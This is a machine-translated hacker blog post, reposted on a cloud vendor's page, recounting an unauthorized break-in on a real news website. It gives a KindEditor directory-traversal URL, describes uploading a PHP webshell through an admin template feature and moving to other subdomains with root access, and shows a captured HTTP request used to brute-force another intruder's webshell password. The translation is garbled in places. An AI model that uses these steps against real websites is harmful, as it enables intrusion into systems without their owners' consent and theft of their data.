Penetrate a large news website

Source: Internet
Author: User

Some time ago, I took a website and sent it to hake. However, there were not many people reading it. I sent it here even if I hadn't posted it online.

The technical content of the article is not very high.

I think this is also original ..

Target news.xxxx.net

 

First, collect information.

This code is quite sexy. Haha

 

Scan another directory.

 

It's amazing to find a directory.

 

But I decided to start from the station.

 

Start with the main site www.xxx.net.

Various directories are scanned.

 

There is FCK... but after trying, I found that the hole has been added.

 

 

I started a long directory flip operation. I flipped through and did not flip to what I could use ..

Another side

Changed to blog.xxx.net.

I have learned this time ..

 

It's kindeditor. I remember there was a directory traversal vulnerability ..

 

Exploitation Method

Http://blog.xxx.net/editor/php/file_manager_json.php? Path =/

I found it... the website root is not in the var/www folder.

Finally, I found it in data/www...

 

Finally, I tried several sites that were not shown on the bypass tools.

123.xxx.net

Test.xxx.net

Demo. xxx. net123 the sub-station opened and found that it was the website navigation of 114la.

 

Some time ago there was 0 day

I tried it.

 

 

OK

Decrypt the password and log on to the background.

I can't do it either in the background. I can't do shell or anything. It's too simple =

See this article with shell.

Http://lcx.cc /? Foxnews00001796.html

Click template management in the background ---> category template --> Add Template

You can directly add php or asp suffixes.

Write a sentence to www.2cto.com.

The trojan is stored in the admin \ tpls \ main \ green \ class directory.

Http://123.xxx.net \ admin \ tpls \ main \ green \ class \ 11.php

 

Now cross-site

I am struggling to find the directory. You should know the picture above.

There is no news.xxx.net directory ..

Later, I wondered if it was a folder under the Home Directory www.xxx.net.

Later, I clicked the news folder to upload a txt file.

Open it with an uneasy mood ..

 

This check is over. In fact, this shell has a lot of permissions. It is root. Because webshell does not have the intention to escalate permissions.

 

Finally, I wrote another article. It seems that there are tutorials on the Internet, but some of them are not very clear, so I can write them together.

When I flipped through the directory, I found the step of my predecessors. A shell with a wrong password and no echo was found.

I tried some passwords but couldn't crack them. I tried to run the dictionary, but I didn't even run it.

But let's talk about how to use the t00ls tool to crack the shell password without echo ..

 

This is the tool. You can go to baidu by yourself ..

How to use it now

 

First, capture the package with the wrong password. Capture the post data.

POST/fckeditor/editor/filemanager/connectors/php/xxx. php HTTP/1.1

Host: www.xxx.net

Connection: keep-aliveReferer: http://www.xxx.net/fckeditor/edi... nectors/php/xxx. php

 

Content-Length: 33

Cache-Control: max-age = 0

Origin: http://www.xxx.net

Content-Type: application/x-www-form-urlencoded

Accept: application/xml, application/xhtml

 

+ Xml, text/html; q = 0.9, text/plain; q = 0.8, image/png, */*; q = 0.5

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1;) AppleWebKit/534.12 (KHTML, like Gecko)

 

Maxthon/3.0 Safari/534.12

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN, zh; q = 0.8

Accept-Charset: GBK, UTF-8; q = 0.7, *; q = 0.3

Cookie:

Wespaceuser = login;

AJSTAT_ OK _times = 1; rTvgYGhchbcookietime = 0; rTvgYGhchbusername = hzck1999;

PHPSESSID = bnkc817f11htk4huq67p7nfpd1; cdb_sid = OhXi57;

_ Utma = 125976530.309523011.13229005369132290053691322901163.2; _ utmc = 125976530;

_ Utmz = 125976530.1322900520.1.1.utmcsr = (direct) | utmccn = (direct) | utmcmd = (none );

Hm_lvt_9dad9a39dc2779b297b1621b72055626 = 1322906408673;

Hm_lpvt_9dad9a39dc2779b297b1621b72055626 = 1322906408673

 

Password = sss & doing = login

 

Here we fill in... note that the password segment is changed to a dictionary variable.

 

Then look at the returned information

I got the blue mark. This is the message returned when the password is incorrect.

 

 

Set the password dictionary again

 

 

Click start ..

If the result is broken, the password will be displayed on the output side...

 

Okay, that's it .. my dishes. there is no technical content in the article, and the results can be obtained only by carefully translating the contents. I hope you will not try it .. in other words, the intrusion process is actually a process of patience and care .. there are only a few technologies.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.